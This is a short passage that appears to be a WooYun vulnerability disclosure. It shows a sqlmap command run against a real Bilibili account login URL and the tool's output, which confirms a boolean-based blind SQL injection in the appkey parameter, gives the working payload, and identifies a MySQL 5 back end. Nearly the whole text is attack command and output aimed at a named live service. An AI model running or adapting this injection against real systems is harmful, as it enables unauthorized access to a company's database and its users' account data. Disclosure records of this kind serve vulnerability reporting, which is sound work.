WooYun.org

python sqlmap.py -u"https://account.bilibili.com/login?appkey=243901e627b808e5&api=http%3A%2F%2Fh.bilibili.com%2Flogin%3Fact%3Dcallback%26do%3Dlogin%26go%3D&sign=707f39fc8b98dfad3b1535ddf48a5696"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: appkey
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: appkey=243901e627b808e5' AND 5860=5860 AND 'CiPn'='CiPn&api=http://h.bilibili.com/login?act=callback%26do=login%26go=&sign=707f39fc8b98dfad3b1535ddf48a5696
---
[19:30:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5